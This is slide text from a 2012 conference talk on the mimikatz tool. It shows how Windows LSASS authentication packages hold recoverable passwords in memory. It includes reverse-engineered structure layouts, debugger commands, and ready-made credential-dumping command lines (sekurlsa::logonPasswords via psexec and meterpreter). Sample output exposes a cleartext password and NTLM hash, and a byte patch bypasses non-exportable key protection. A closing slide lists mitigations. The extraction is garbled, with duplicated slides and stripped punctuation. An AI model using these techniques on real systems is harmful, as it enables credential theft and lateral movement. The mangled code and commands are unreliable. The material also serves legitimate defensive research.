typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64 BYTE unk0[108] elif defined _M_IX86 BYTE unk0[64] endif LUID LocallyUniqueIdentifier PVOID unk1 PVOID unk2 PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIAL
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
mimikatz sekurlsa tspkg demo time
mimikatz sekurlsa tspkg demo time
sekurlsatspkg
sekurlsatspkg
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15 15
mimikatz sekurlsa wdigest mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
because clear text password over httphttps is not cool
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16 16
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17 17
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18 18
mimikatz sekurlsa wdigest theory
mimikatz sekurlsa wdigest theory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigest workflow
mimikatz sekurlsa wdigest workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flink struct _KIWI_WDIGEST_LIST_ENTRY Blink DWORD UsageCount struct _KIWI_WDIGEST_LIST_ENTRY This LUID LocallyUniqueIdentifier [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password [hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LKIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigest demo time
mimikatz sekurlsa wdigest demo time
sekurlsawdigest
sekurlsawdigest
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21 21
mimikatz sekurlsa livessp mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
because Microsoft was too good in closed networks
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22 22
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23 23
0 kdgt process 0 0 lsassexe PROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4 DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not Accessiblegt Image lsassexe 0 kdgt process i 83569040 You need to continue execution (press g ltentergt) for the context to be switched When the debugger breaks in again you will be in the new process context 0 kdgt g Break instruction exception - code 80000003 (first chance) ntRtlpBreakWithStatusInstruction 814b39d0 cc int 3 0 kdgt reload user Loading User Symbols 0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g 0 kdgt g
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24 24
lsasrvLsaProtectMemory livesspLiveMakeSupplementalCred livesspLiveMakeSecPkgCredentials livesspLsaApLogonUserEx2 livesspSpiLogonUserEx2 lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2 livesspLsaApLogonUserEx2 (74781536) [] livesspLsaApLogonUserEx2+0x560 (74781a96) call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp workflow
mimikatz sekurlsa livessp workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flink struct _KIWI_LIVESSP_LIST_ENTRY Blink PVOID unk0 PVOID unk1 PVOID unk2 PVOID unk3 DWORD unk4 DWORD unk5 PVOID unk6 LUID LocallyUniqueIdentifier LSA_UNICODE_STRING UserName PVOID unk7 PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LISKIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSupp DWORD unk0 LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
